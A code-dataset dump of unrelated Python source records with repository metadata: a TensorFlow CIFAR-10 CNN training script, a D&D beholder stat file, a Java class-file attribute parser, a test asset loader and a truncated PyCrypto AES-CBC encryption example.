mnist_train = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TRAIN, batch_size=-1))
imgs_train, labels_train = mnist_train['image'].reshape(-1, 3072) / 255., mnist_train['label']
# imgs_train, labels_train = tf.reshape(mnist_train['image'], shape=[-1, 784]), tf.one_hot(mnist_train['label'], depth=10)
mnist_test = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TEST, batch_size=-1))
# mnist_test = tfds.load("mnist", split=tfds.Split.TEST, batch_size=-1)
imgs_test, labels_test = mnist_test['image'].reshape(-1, 3072) / 255., mnist_test['label']
learning_rate = 3e-4 #@param {type:"number"}
batch_size = 256 #@param {type:"integer"}
num_epochs = 80 #@param {type:"integer"}
graph = tf.Graph()
with graph.as_default():
x = tf.placeholder(tf.float32, shape=[None, 3072])
y_p = tf.placeholder(tf.int64, shape=[None, ])
y = tf.one_hot(y_p, depth=10)
keep_pro = tf.placeholder(tf.float32)
x_imgs = tf.reshape(x, shape=[-1, 32, 32, 3], name='input_images')
w_1 = tf.Variable(tf.truncated_normal([3, 3, 3, 64], stddev=0.1), name='weights_conv1')
b_1 = tf.Variable(tf.constant(0.1, shape=[64]), name='bias_conv1')
h_conv1 = tf.nn.relu(tf.nn.conv2d(x_imgs, w_1, strides=[1, 1, 1, 1], padding='SAME') + b_1)
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
w_2 = tf.Variable(tf.truncated_normal([3, 3, 64, 128], stddev=0.1), name='weights_conv2')
b_2 = tf.Variable(tf.constant(0.1, shape=[128]), name='bias_conv2')
h_conv2 = tf.nn.relu(tf.nn.conv2d(h_pool1, w_2, strides=[1, 1, 1, 1], padding='SAME') + b_2)
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
# layer_shape = h_pool2.get_shape().as_list()
# num_f = reduce(lambda a,b:a * b, layer_shape[1:])
# h_pool2_fla = tf.reshape(h_pool2, shape=[-1, num_f])
h_pool2_fla = tf.layers.flatten(h_pool2)
num_f = h_pool2_fla.get_shape().as_list()[-1]
w_fc1 = tf.Variable(tf.truncated_normal([num_f, 256], stddev=0.1), name='weights_fc1')
b_fc1 = tf.Variable(tf.constant(0.1, shape=[256]), name='bias_fc1')
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_fla, w_fc1) + b_fc1)
h_drop1 = tf.nn.dropout(h_fc1, keep_prob=keep_pro, name='Dropout')
w_fc2 = tf.Variable(tf.truncated_normal([256, 10], stddev=0.1), name='weights_fc2')
b_fc2 = tf.Variable(tf.constant(0.1, shape=[10]), name='bias_fc2')
h_fc2 = tf.matmul(h_drop1, w_fc2) + b_fc2
# tf.add_to_collection(tf.GraphKeys.WEIGHTS, w_fc1)
# regularizer = tf.contrib.layers.l2_regularizer(scale=1500./60000)
# reg_tem = tf.contrib.layers.apply_regularization(regularizer)
with tf.name_scope('loss'):
entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2))
# entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2) + reg_tem)
with tf.name_scope('accuracy'):
prediction = tf.cast(tf.equal(tf.argmax(h_fc2, 1), tf.argmax(y, 1)), "float")
accuracy = tf.reduce_mean(prediction)
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(entropy_loss)
sess = tf.Session()
with sess.as_default():
sess.run(tf.global_variables_initializer())
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
for num in range(num_epochs):
# batch = mnist.train.next_batch(batch_size)
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
# imgs_train, labels_train = batch_imgs.reshape(-1, 784), batch_labels
imgs_data = np.c_[imgs_train, labels_train]
np.random.shuffle(imgs_data)
num_batchs = imgs_train.shape[0] // batch_size
start = time.time()
for num_ep in range(num_batchs):
# start = time.time()
imgs_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size, :-1]
labels_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size,-1]
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_batch,
y_p: labels_batch,
keep_pro: 0.5})
end = time.time()
acc *= 100
num_e = str(num + 1)
print_list = [num_e, loss, acc]
print("Epoch {0[0]}, train_loss is {0[1]:.4f}, accuracy is {0[2]:.2f}%.".format(print_list))
print("Running time is {0:.2f}s.".format(end-start))
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_test,
y_p: labels_test,
keep_pro: 1.})
acc *= 100
print_list = [loss, acc]
print("Test_loss is {0[0]:.4f}, accuracy is {0[1]:.2f}%.".format(print_list))
sess.close() | 54.118644 | 126 | 0.595521 | #@title datasets_tutorials(cifar-10) { display-mode: "both" }
# coding: utf-8
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# from functools import reduce
import tensorflow_datasets as tfds
import numpy as np
import time
def format_tran(tfdata, batch_size=32):
batch_tfdata = tfdata.shuffle(1).batch(batch_size)
batch_imgs = tfds.as_numpy(batch_tfdata).__next__()['image']
batch_labels = tfds.as_numpy(batch_tfdata).__next__()['label']
return batch_imgs, batch_labels
# tf.logging.set_verbosity(tf.logging.ERROR)
if __name__ == '__main__':
# filepath = '/content/GoogleDrive/Python27/MNIST_data'
# # filepath = r'E:\Anaconda2\Programs\MNIST_data'
# mnist = input_data.read_data_sets(filepath, one_hot=True)
# mnist_train = tfds.load("mnist", split=tfds.Split.TRAIN)
mnist_train = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TRAIN, batch_size=-1))
imgs_train, labels_train = mnist_train['image'].reshape(-1, 3072) / 255., mnist_train['label']
# imgs_train, labels_train = tf.reshape(mnist_train['image'], shape=[-1, 784]), tf.one_hot(mnist_train['label'], depth=10)
mnist_test = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TEST, batch_size=-1))
# mnist_test = tfds.load("mnist", split=tfds.Split.TEST, batch_size=-1)
imgs_test, labels_test = mnist_test['image'].reshape(-1, 3072) / 255., mnist_test['label']
learning_rate = 3e-4 #@param {type:"number"}
batch_size = 256 #@param {type:"integer"}
num_epochs = 80 #@param {type:"integer"}
graph = tf.Graph()
with graph.as_default():
x = tf.placeholder(tf.float32, shape=[None, 3072])
y_p = tf.placeholder(tf.int64, shape=[None, ])
y = tf.one_hot(y_p, depth=10)
keep_pro = tf.placeholder(tf.float32)
x_imgs = tf.reshape(x, shape=[-1, 32, 32, 3], name='input_images')
w_1 = tf.Variable(tf.truncated_normal([3, 3, 3, 64], stddev=0.1), name='weights_conv1')
b_1 = tf.Variable(tf.constant(0.1, shape=[64]), name='bias_conv1')
h_conv1 = tf.nn.relu(tf.nn.conv2d(x_imgs, w_1, strides=[1, 1, 1, 1], padding='SAME') + b_1)
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
w_2 = tf.Variable(tf.truncated_normal([3, 3, 64, 128], stddev=0.1), name='weights_conv2')
b_2 = tf.Variable(tf.constant(0.1, shape=[128]), name='bias_conv2')
h_conv2 = tf.nn.relu(tf.nn.conv2d(h_pool1, w_2, strides=[1, 1, 1, 1], padding='SAME') + b_2)
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
# layer_shape = h_pool2.get_shape().as_list()
# num_f = reduce(lambda a,b:a * b, layer_shape[1:])
# h_pool2_fla = tf.reshape(h_pool2, shape=[-1, num_f])
h_pool2_fla = tf.layers.flatten(h_pool2)
num_f = h_pool2_fla.get_shape().as_list()[-1]
w_fc1 = tf.Variable(tf.truncated_normal([num_f, 256], stddev=0.1), name='weights_fc1')
b_fc1 = tf.Variable(tf.constant(0.1, shape=[256]), name='bias_fc1')
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_fla, w_fc1) + b_fc1)
h_drop1 = tf.nn.dropout(h_fc1, keep_prob=keep_pro, name='Dropout')
w_fc2 = tf.Variable(tf.truncated_normal([256, 10], stddev=0.1), name='weights_fc2')
b_fc2 = tf.Variable(tf.constant(0.1, shape=[10]), name='bias_fc2')
h_fc2 = tf.matmul(h_drop1, w_fc2) + b_fc2
# tf.add_to_collection(tf.GraphKeys.WEIGHTS, w_fc1)
# regularizer = tf.contrib.layers.l2_regularizer(scale=1500./60000)
# reg_tem = tf.contrib.layers.apply_regularization(regularizer)
with tf.name_scope('loss'):
entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2))
# entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2) + reg_tem)
with tf.name_scope('accuracy'):
prediction = tf.cast(tf.equal(tf.argmax(h_fc2, 1), tf.argmax(y, 1)), "float")
accuracy = tf.reduce_mean(prediction)
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(entropy_loss)
sess = tf.Session()
with sess.as_default():
sess.run(tf.global_variables_initializer())
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
for num in range(num_epochs):
# batch = mnist.train.next_batch(batch_size)
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
# imgs_train, labels_train = batch_imgs.reshape(-1, 784), batch_labels
imgs_data = np.c_[imgs_train, labels_train]
np.random.shuffle(imgs_data)
num_batchs = imgs_train.shape[0] // batch_size
start = time.time()
for num_ep in range(num_batchs):
# start = time.time()
imgs_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size, :-1]
labels_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size,-1]
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_batch,
y_p: labels_batch,
keep_pro: 0.5})
end = time.time()
acc *= 100
num_e = str(num + 1)
print_list = [num_e, loss, acc]
print("Epoch {0[0]}, train_loss is {0[1]:.4f}, accuracy is {0[2]:.2f}%.".format(print_list))
print("Running time is {0:.2f}s.".format(end-start))
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_test,
y_p: labels_test,
keep_pro: 1.})
acc *= 100
print_list = [loss, acc]
print("Test_loss is {0[0]:.4f}, accuracy is {0[1]:.2f}%.".format(print_list))
sess.close() | 241 | 0 | 23 |
fd159e5b7be13647139239dadc5e344afd11ffea | 1,211 | py | Python | monsters.py | ElijahZAwesome/Monster-Wiki-Bot | 7c343228090ee98347d5575ac7a253a38e4d8f98 | [
"MIT"
] | null | null | null | monsters.py | ElijahZAwesome/Monster-Wiki-Bot | 7c343228090ee98347d5575ac7a253a38e4d8f98 | [
"MIT"
] | null | null | null | monsters.py | ElijahZAwesome/Monster-Wiki-Bot | 7c343228090ee98347d5575ac7a253a38e4d8f98 | [
"MIT"
] | null | null | null | #Declaring vars goes like this:
#
#in the file, all ya gotta do is specify
#
#<monster>_<info> = "value"
#
#info can be:
#
#size
#hitpoints
#speed
#strength
#dexterity
#constitution
#intelligence
#wisdom
#charisma
#senses
#language
#challenge
#dice
#initiative
#armor
#baseattack
#attack
#fullattack
#reach
#specialattack
#specialquality
#enviroment
#
#Remember that you dont have to specify everything, like senses for example
beholder_desc = '"It floats before you, a bulbous body with a central, unblinking eye, and a large maw filled with daggerlike teeth. Smaller eyes, attached to wriggling stalks, sprout from the top of the orblike body."'
beholder_size = "Large Aberration"
beholder_dice = "11d8+44 (93 hp)"
beholder_initiative = "+6"
beholder_armor = "26 (-1 size, +2 Dex, +15 natural), touch 11, flat-footed 24"
beholder_speed = "5ft. (1 square), fly 20ft. (good)"
beholder_baseattack = "+8/+12"
beholder_attack = "Eye rays +9 ranged touch and bite +2 melee (2d4)"
beholder_fullattack = "Same as attack"
beholder_reach = "10ft./5ft."
beholder_specialattack = "Eye rays"
beholder_specialquality = "All-around vision, antimagic cone, darkvision 60 ft., and flight."
beholder_enviroment = "Cold hills" | 26.326087 | 219 | 0.753097 | #Declaring vars goes like this:
#
#in the file, all ya gotta do is specify
#
#<monster>_<info> = "value"
#
#info can be:
#
#size
#hitpoints
#speed
#strength
#dexterity
#constitution
#intelligence
#wisdom
#charisma
#senses
#language
#challenge
#dice
#initiative
#armor
#baseattack
#attack
#fullattack
#reach
#specialattack
#specialquality
#enviroment
#
#Remember that you dont have to specify everything, like senses for example
beholder_desc = '"It floats before you, a bulbous body with a central, unblinking eye, and a large maw filled with daggerlike teeth. Smaller eyes, attached to wriggling stalks, sprout from the top of the orblike body."'
beholder_size = "Large Aberration"
beholder_dice = "11d8+44 (93 hp)"
beholder_initiative = "+6"
beholder_armor = "26 (-1 size, +2 Dex, +15 natural), touch 11, flat-footed 24"
beholder_speed = "5ft. (1 square), fly 20ft. (good)"
beholder_baseattack = "+8/+12"
beholder_attack = "Eye rays +9 ranged touch and bite +2 melee (2d4)"
beholder_fullattack = "Same as attack"
beholder_reach = "10ft./5ft."
beholder_specialattack = "Eye rays"
beholder_specialquality = "All-around vision, antimagic cone, darkvision 60 ft., and flight."
beholder_enviroment = "Cold hills" | 0 | 0 | 0 |
69fcdb91611709f74926d6ab00afefc9cdb17c0d | 11,536 | py | Python | src/python/twitter/common/java/attribute_info.py | zhouyijiaren/commons | 10df6fb63547baa9047782aa7ad4edf354914b10 | [
"Apache-2.0"
] | 1,143 | 2015-01-05T04:19:24.000Z | 2019-12-11T12:02:23.000Z | src/python/twitter/common/java/attribute_info.py | zhouyijiaren/commons | 10df6fb63547baa9047782aa7ad4edf354914b10 | [
"Apache-2.0"
] | 144 | 2015-01-06T05:05:07.000Z | 2019-12-12T18:02:37.000Z | src/python/twitter/common/java/attribute_info.py | zhouyijiaren/commons | 10df6fb63547baa9047782aa7ad4edf354914b10 | [
"Apache-2.0"
] | 426 | 2015-01-08T08:33:41.000Z | 2019-12-09T13:15:40.000Z | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import sys
from .java_types import *
from .class_flags import ClassFlags
from . import signature_parser
class AttributeInfo(object):
"""
Encapsulate the attribute_info class.
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#43817
attribute_info {
u2 attribute_name_index;
u4 attribute_length;
u1 info[attribute_length];
}
"""
def size(self):
"""Total size of the attribute_info blob."""
return self._size
def bytes(self):
"""Attribute-specific data for subclasses."""
return self._info_data
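# Illustrative sketch (not part of the original module): the attribute_info
# header documented above is a big-endian u2 followed by a u4, so the first six
# bytes can also be unpacked with the standard struct module instead of the
# project's u2/u4 helpers.
import struct
def peek_attribute_header(data):
  """Return (attribute_name_index, attribute_length) from a raw attribute blob."""
  name_index, length = struct.unpack('>HI', data[:6])
  return name_index, length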
class Code(AttributeInfo):
"""
Code_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 max_stack;
u2 max_locals;
u4 code_length;
u1 code[code_length];
u2 exception_table_length;
{
u2 start_pc;
u2 end_pc;
u2 handler_pc;
u2 catch_type;
} exception_table[exception_table_length];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
"""
  @staticmethod
  def name():
    return 'Code'
class SourceFile(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79868
SourceFile_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 sourcefile_index;
}
"""
  @staticmethod
  def name():
    return 'SourceFile'
class Exceptions(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#3129
Exceptions_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 number_of_exceptions;
u2 exception_index_table[number_of_exceptions];
}
"""
  @staticmethod
  def name():
    return 'Exceptions'
class Signature(AttributeInfo):
"""
Signature_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 signature_index
}
"""
  @staticmethod
  def name():
    return 'Signature'
class InnerClassFlags(object):
"""http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#75734
"""
ACC_PUBLIC = 0x0001
ACC_PRIVATE = 0x0002
ACC_PROTECTED = 0x0004
ACC_STATIC = 0x0008
ACC_FINAL = 0x0010
ACC_INTERFACE = 0x0200
ACC_ABSTRACT = 0x0400
ACC_SYNTHETIC = 0x1000
ACC_ANNOTATION = 0x2000
ACC_ENUM = 0x4000
MASK = ACC_PUBLIC | ACC_PRIVATE | ACC_PROTECTED | \
ACC_STATIC | ACC_FINAL | ACC_INTERFACE | \
ACC_ABSTRACT | ACC_SYNTHETIC | ACC_ANNOTATION | \
ACC_ENUM
class InnerClasses(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79996
InnerClasses_attribute {
u2 attribute_name_index;
u4 attribute_length;
------
u2 number_of_classes;
{ u2 inner_class_info_index;
u2 outer_class_info_index;
u2 inner_name_index;
u2 inner_class_access_flags;
} classes[number_of_classes];
}
"""
  @staticmethod
  def name():
    return 'InnerClasses'
class Attribute(object):
"""
Factory for producing AttributeInfos.
"""
_KNOWN_ATTRIBUTE_MAP = {
SourceFile.name(): SourceFile,
Signature.name(): Signature,
Exceptions.name(): Exceptions,
Code.name(): Code
# InnerClasses.name(): InnerClasses
}
@staticmethod
def parse(data, constants):
"""Parse the Attribute_info
@data: The data stream from which to deserialize the blob
@constants: The constant pool of the class file.
"""
attribute_name_index = u2(data[0:2]).get()
attribute_name = constants[attribute_name_index]
attribute_class = Attribute._KNOWN_ATTRIBUTE_MAP.get(attribute_name.bytes(), None)
if attribute_class is not None:
return attribute_class(data, constants)
else:
return AttributeInfo(data, constants)
| 30.357895 | 100 | 0.663835 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import sys
from .java_types import *
from .class_flags import ClassFlags
from . import signature_parser
class AttributeInfo(object):
"""
Encapsulate the attribute_info class.
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#43817
attribute_info {
u2 attribute_name_index;
u4 attribute_length;
u1 info[attribute_length];
}
"""
def __init__(self, data, constants):
self._parse_header(data, constants)
def _parse_header(self, data, constants):
self._attribute_name_index = u2(data[0:2]).get()
self._attribute_name = constants[self._attribute_name_index]
self._attribute_length = u4(data[2:6]).get()
self._size = 6 + self._attribute_length
self._info_data = data[6:self._size]
def name(self):
return self._attribute_name
def size(self):
"""Total size of the attribute_info blob."""
return self._size
def parsed_name(self):
return self._attribute_name
def bytes(self):
"""Attribute-specific data for subclasses."""
return self._info_data
def __str__(self):
return 'AttributeInfo(name:%s, size=%d)' % (self._attribute_name, self.size())
class Code(AttributeInfo):
"""
Code_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 max_stack;
u2 max_locals;
u4 code_length;
u1 code[code_length];
u2 exception_table_length;
{
u2 start_pc;
u2 end_pc;
u2 handler_pc;
u2 catch_type;
} exception_table[exception_table_length];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
"""
@staticmethod
def name():
return 'Code'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
(max_stack, max_locals, code_length), bytes = JavaNativeType.parse(bytes, u2, u2, u4)
self._code_length = code_length
bytecode = bytes[0:code_length]
bytes = bytes[code_length:]
(exception_table_length,), bytes = JavaNativeType.parse(bytes, u2)
# gobble up stuff
for k in range(exception_table_length):
_, bytes = JavaNativeType.parse(bytes, u2, u2, u2, u2)
(attributes_count,), bytes = JavaNativeType.parse(bytes, u2)
attributes = []
offset = 0
for k in range(attributes_count):
attribute = Attribute.parse(bytes[offset:], constants)
offset += attribute.size()
attributes.append(attribute)
self._attributes = attributes
def __str__(self):
output = 'Code(length:%s)' % self._code_length
if self._attributes:
output += '\n'
attrs = []
for attr in self._attributes:
attrs.append(' %s: %s' % (attr.name(), attr))
output += '\n'.join(attrs)
return output
class SourceFile(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79868
SourceFile_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 sourcefile_index;
}
"""
@staticmethod
def name():
return 'SourceFile'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._sourcefile_index = u2(bytes[0:2]).get()
self._sourcefile = constants[self._sourcefile_index]
def __str__(self):
return 'SourceFile(file:%s)' % self._sourcefile
class Exceptions(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#3129
Exceptions_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 number_of_exceptions;
u2 exception_index_table[number_of_exceptions];
}
"""
@staticmethod
def name():
return 'Exceptions'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._number_of_exceptions = u2(bytes[0:2]).get()
self._exceptions = []
for index in range(self._number_of_exceptions):
constant_index = u2(bytes[2*(index+1):]).get()
self._exceptions.append(constants[constant_index](constants))
def __str__(self):
if self._exceptions:
return 'throws %s' % ' '.join('%s' % s for s in self._exceptions)
else:
return ''
class Signature(AttributeInfo):
"""
Signature_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 signature_index
}
"""
@staticmethod
def name():
return 'Signature'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._signature_index = u2(bytes[0:2]).get()
self._signature = constants[self._signature_index]
self._parsed = None
self._parse_signature()
def _parse_signature(self):
class_signature, _ = signature_parser.ClassSignature.match(self._signature.bytes())
if class_signature:
self._parsed = class_signature
return
method_signature, _ = signature_parser.MethodTypeSignature.match(self._signature.bytes())
if method_signature:
self._parsed = method_signature
def __str__(self):
return 'Signature(%s)' % (
self._parsed)
class InnerClassFlags(object):
"""http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#75734
"""
ACC_PUBLIC = 0x0001
ACC_PRIVATE = 0x0002
ACC_PROTECTED = 0x0004
ACC_STATIC = 0x0008
ACC_FINAL = 0x0010
ACC_INTERFACE = 0x0200
ACC_ABSTRACT = 0x0400
ACC_SYNTHETIC = 0x1000
ACC_ANNOTATION = 0x2000
ACC_ENUM = 0x4000
MASK = ACC_PUBLIC | ACC_PRIVATE | ACC_PROTECTED | \
ACC_STATIC | ACC_FINAL | ACC_INTERFACE | \
ACC_ABSTRACT | ACC_SYNTHETIC | ACC_ANNOTATION | \
ACC_ENUM
def __init__(self, flags):
self._flags = flags
if flags ^ (flags & InnerClassFlags.MASK) != 0:
print >> sys.stderr, "Invalid InnerClassFlags mask!! Extra bits: %s" % (
flags ^ (flags & InnerClassFlags.MASK))
def public(self):
return self._flags & InnerClassFlags.ACC_PUBLIC
def private(self):
return self._flags & InnerClassFlags.ACC_PRIVATE
def protected(self):
return self._flags & InnerClassFlags.ACC_PROTECTED
def static(self):
return self._flags & InnerClassFlags.ACC_STATIC
def final(self):
return self._flags & InnerClassFlags.ACC_FINAL
def interface(self):
return self._flags & InnerClassFlags.ACC_INTERFACE
def abstract(self):
return self._flags & InnerClassFlags.ACC_ABSTRACT
def synthetic(self):
return self._flags & InnerClassFlags.ACC_SYNTHETIC
def annotation(self):
return self._flags & InnerClassFlags.ACC_ANNOTATION
def enum(self):
return self._flags & InnerClassFlags.ACC_ENUM
def __str__(self):
verbs = []
if self.public(): verbs.append('public')
if self.private(): verbs.append('private')
if self.protected(): verbs.append('protected')
if self.static(): verbs.append('static')
if self.final(): verbs.append('final')
if self.interface(): verbs.append('interface')
if self.abstract(): verbs.append('abstract')
if self.synthetic(): verbs.append('synthetic')
if self.annotation(): verbs.append('annotation')
if self.enum(): verbs.append('enum')
return ' '.join(verbs)
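# Small illustrative example (not part of the original source): the access flag
# word is a plain bitmask, e.g. 0x0019 sets ACC_PUBLIC, ACC_STATIC and ACC_FINAL,
# so it renders as 'public static final'.
def _demo_inner_class_flags():
  flags = InnerClassFlags(0x0019)
  return str(flags)  # -> 'public static final'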
class InnerClass(object):
def __init__(self, data, constants):
(inner_class_info_index, outer_class_info_index,
inner_name_index, inner_class_flags), data = JavaNativeType.parse(data, u2, u2, u2, u2)
debug = """
print 'constant pool size, inner, outer, name, flags = %s, %s, %s, %s, %s => %s' % (
len(constants),
inner_class_info_index,
outer_class_info_index,
inner_name_index,
inner_class_flags,
InnerClassFlags(inner_class_flags))
"""
self._inner_class = constants[inner_class_info_index]
if outer_class_info_index < len(constants):
self._outer_class = constants[outer_class_info_index]
else:
print >> sys.stderr, 'WARNING: Malformed InnerClass(outer_class_info_index)!'
self._outer_class = None
if inner_name_index < len(constants):
self._inner_name = constants[inner_name_index]
else:
print >> sys.stderr, 'WARNING: Malformed InnerClass(inner_name)!'
self._inner_name = None
self._inner_class_access_flags = InnerClassFlags(inner_class_flags)
if self._inner_class is not None:
self._inner_class = self._inner_class(constants)
if self._outer_class is not None:
self._outer_class = self._outer_class(constants)
if self._inner_name is not None:
self._inner_name = self._inner_name(constants)
else:
self._inner_name = 'Anonymous'
def __str__(self):
return '%s %s::%s %s' % (
self._inner_class_access_flags,
self._outer_class,
self._inner_class,
self._inner_name)
class InnerClasses(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79996
InnerClasses_attribute {
u2 attribute_name_index;
u4 attribute_length;
------
u2 number_of_classes;
{ u2 inner_class_info_index;
u2 outer_class_info_index;
u2 inner_name_index;
u2 inner_class_access_flags;
} classes[number_of_classes];
}
"""
@staticmethod
def name():
return 'InnerClasses'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._number_of_classes = u2(bytes[0:2]).get()
self._classes = []
offset = 2
for index in range(self._number_of_classes):
klass = InnerClass(data[offset:], constants)
self._classes.append(klass)
offset += 4 * u2.size()
def __str__(self):
return '{\n%s\n}' % ('\n '.join('%s' % s for s in self._classes))
class Attribute(object):
"""
Factory for producing AttributeInfos.
"""
_KNOWN_ATTRIBUTE_MAP = {
SourceFile.name(): SourceFile,
Signature.name(): Signature,
Exceptions.name(): Exceptions,
Code.name(): Code
# InnerClasses.name(): InnerClasses
}
@staticmethod
def parse(data, constants):
"""Parse the Attribute_info
@data: The data stream from which to deserialize the blob
@constants: The constant pool of the class file.
"""
attribute_name_index = u2(data[0:2]).get()
attribute_name = constants[attribute_name_index]
attribute_class = Attribute._KNOWN_ATTRIBUTE_MAP.get(attribute_name.bytes(), None)
if attribute_class is not None:
return attribute_class(data, constants)
else:
return AttributeInfo(data, constants)
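# Usage sketch (illustrative only, not part of the original module): attributes
# are laid out back to back, so a caller can walk a raw attribute table by
# parsing each entry and advancing by size(), the same pattern Code.__init__
# uses for its nested attribute list.
def parse_attribute_table(data, count, constants):
  attributes = []
  offset = 0
  for _ in range(count):
    attribute = Attribute.parse(data[offset:], constants)
    attributes.append(attribute)
    offset += attribute.size()
  return attributes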
| 6,082 | 4 | 891 |
30077f1fb1c77491461f07166fae7c2a55b94011 | 196 | py | Python | tests/assets/__init__.py | giorgiosironi/jats-ingester | 3873e8141f34ebe6237de746ac5e84f131f15800 | [
"MIT"
] | null | null | null | tests/assets/__init__.py | giorgiosironi/jats-ingester | 3873e8141f34ebe6237de746ac5e84f131f15800 | [
"MIT"
] | null | null | null | tests/assets/__init__.py | giorgiosironi/jats-ingester | 3873e8141f34ebe6237de746ac5e84f131f15800 | [
"MIT"
] | null | null | null | from pathlib import Path
| 19.6 | 51 | 0.622449 | from pathlib import Path
def get_asset(name):
try:
path = next(Path('.').glob('**/%s' % name))
except StopIteration:
raise FileNotFoundError
return path.read_bytes()
| 147 | 0 | 23 |
55431168e1c8c9a42b9829883906423b49c14f48 | 486 | py | Python | pyaes.py | shanyuanqiao/crypto-pkcs7-example | 4940144deb63d4ab52df20e69119610a94254893 | [
"blessing"
] | 28 | 2015-03-11T05:24:08.000Z | 2022-01-21T21:26:03.000Z | pyaes.py | shanyuanqiao/crypto-pkcs7-example | 4940144deb63d4ab52df20e69119610a94254893 | [
"blessing"
] | 1 | 2016-01-31T23:22:18.000Z | 2016-01-31T23:22:18.000Z | pyaes.py | shanyuanqiao/crypto-pkcs7-example | 4940144deb63d4ab52df20e69119610a94254893 | [
"blessing"
] | 17 | 2015-03-27T08:30:33.000Z | 2019-07-13T08:30:10.000Z | from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import base64
key = 'your key 16bytes'
# 16 byte initialization vector
iv = '1234567812345678'
aes = AES.new(key, AES.MODE_CBC, iv)
encoder = PKCS7Encoder()
text = 'This is my plain text'
# pad the plain text according to PKCS7
pad_text = encoder.encode(text)
# encrypt the padding text
cipher = aes.encrypt(pad_text)
# base64 encode the cipher text for transport
enc_cipher = base64.b64encode(cipher)
print enc_cipher
| 21.130435 | 45 | 0.769547 | from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import base64
key = 'your key 16bytes'
# 16 byte initialization vector
